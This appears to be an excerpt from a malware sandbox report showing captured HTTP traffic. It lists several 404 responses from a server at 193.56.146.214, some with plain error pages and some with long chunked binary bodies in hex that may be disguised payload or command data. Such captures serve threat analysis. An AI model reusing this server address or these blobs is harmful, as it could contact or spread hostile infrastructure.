                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:03 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 39 33 38 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 1d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 85 a5 24 d1 ee 12 d7 a8 78 27 4c 76 46 ea d6 2c 43 64 1b 67 c4 62 1c 74 29 44 86 43 af 6f a0 68 8a 59 6d 82 4a a7 cf 1f c6 a3 13 69 4a 24 b3 ea 27 63 13 57 70 50 68 6a 3e e0 2f 7a 70 79 23 e3 d8 2f 09 13 72 9b be 7c 42 bf 19 de 6c dc 13 55 70 53 0a 46 17 7c e7 ba 3f dc 9e 2e c9 81 e8 ce 05 4c c4 c1 52 3a 54 6b ad 87 f9 07 87 d6 41 c9 b0 26 1c 94 30 99 7f 5b 92 2a 93 5b af a8 98 7a bd 0b e2 a4 22 3e 1a 20 cc cc b6 ca 21 af ad f5 31 a1 a3 cf 37 1f 5a eb 3f 5c c5 74 59 90 8f f5 06 b6 0e cd 9a df a5 61 69 fd 70 12 70 df ce 22 db e0 ab ab b6 2e 08 8f ff dd 4c 76 20 e1 ff 38 5c 3f 0f 83 d0 20 38 ba 60 bd 59 22 09 79 53 40 98 e3 94 54 f0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1f f1 69 d5 92 4e 76 8c 96 bd 4a 16 e9 37 a2 55 6b 5f c7 ae 4a 88 54 d9 4e 3d b6 7b 93 fe 88 2c 93 7e 87 12 75 d7 9a db 05 a9 46 75 18 c7 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 69 4f 44 88 fe 40 0a 5c 69 ba e8 33 74 16 00 89 12 1e 0d 63 bb 9c d4 46 d1 64 3b df d5 af 2b 02 57 d3 db 53 3d a0 c3 96 8b 7d 64 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 2e 64 35 e2 26 2c 74 a4 34 54 05 91 5f ef 6c 05 23 8f f5 4a b0 de 7f 0d 6a f3 d8 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 92 d6 ea 8c 11 7d 72 d7 6a ab c1 39 e2 23 13 96 c4 66 d1 30 80 06 10 b2 9c 78 c6 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff f3 53 5d b5 78 3d f1 24 a0 e9 37 7f 3b 60 ff f1 ee 71 c0 b6 4f 4d bb 75 4b 53 06 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 d3 03 e8 e9 32 2c 0d 90 db 4f f4 47 d3 1c 4c 93 19 c0 0d 04 7d 76 88 52 8c 2a 01 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 28 48 94 14 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 34 30 30 36 61 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 9c a2 ae 7a b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c af 3a 05 14 a5 5d ef 3b f3 56 72 bc 3d 1a 04 b2 50 2a 87 d6 17 8f 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 7a 6d 2e e6 2a 7e d7 3f dc 9e 2e cb 81 a8 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a 95 5f 97 a6 75 3e 1a 20 8c a3 b0 ca 79 f7 ad f5 31 61 a4 cf 37 1f 1a eb 3f ae c6 74 31 8c 8f f5 03 96 0b cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c 3b 4c f9 10 e5 ec 9a db 25 2f 45 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 ec fd 05 89 52 de 0e 63 bb d6 d4 46 d1 f2 38 df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 31 e2 08 5a 11 dc 40 b4 06 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 5b ab 10 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 68 1e 11 b2 18 4c c1 58 40 f6 e7 2a 33 72 08 ac 78 ae 53 ff 0f 71 5f 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b5 2c f4 47 1c 3f 4d 93 1e 60 70 06 72 52 89 52 93 3e 09 6e c1 ca 39 52 3e cc 35 5f d8 89 98 4c 97 49 94 56 ef 01 37 e2 41 44 f0 8b 65 48 8a 76 e1 41 84 8e 71 b4 0d 16 5e ea 87 04 82 cd 7d 42 fd bd 38 ad 2a 2c 3f 86 9c aa ca b7 04 d6 62 da f5 e1 c8 09 f8 66 f4 23 a4 3b ca b5 a0 83 56 84 86 76 4e 38 13 f9 77 46 05 19 a7 ae 19 17 b0 68 d3 a1 24 4f 38 6a 19 e7 66 f5 1d 33 c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 77 ed f6 4b a5 53 52 d2 c7 d4 d1 79 5e 67 ad 6d 15 b0 c0 db 31 a0 29 77 39 ac b2 03 07 1e 17 76 38 bc db 58 67 4b 5b 67 e2 3f d3 78 d9 f8 1f ba a2 50 11 3b ec 5f e0 3c 47 4b d4 50 b0 20 e1 1e 34 ee d3 2e ac 9c d8 f7 0d c0 23 af 38 15 06 1f 84 48 7f 4f 6d 5b df 92 a0 cf 0b 80 51 a9 cd 6d e1 7c 1c 9d 89 05 4d 99 2e 94 58 13 86 89 b0 6e 2c dc c3 75 44 f4 8b 85 52 aa a2 e4 2f a9 e7 5b 9a 1e bd 79
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 37 63 63 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 7c a2 52 90 b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c f9 3e 05 14 73 5e ef 3b f3 56 72 70 6e 1e 04 b2 50 2a 87 d6 37 83 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 da 9d 1d b3 9c 88 8a 38 22 7a 61 2e e6 2a 7e d7 46 ad 96 2e cb 81 88 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 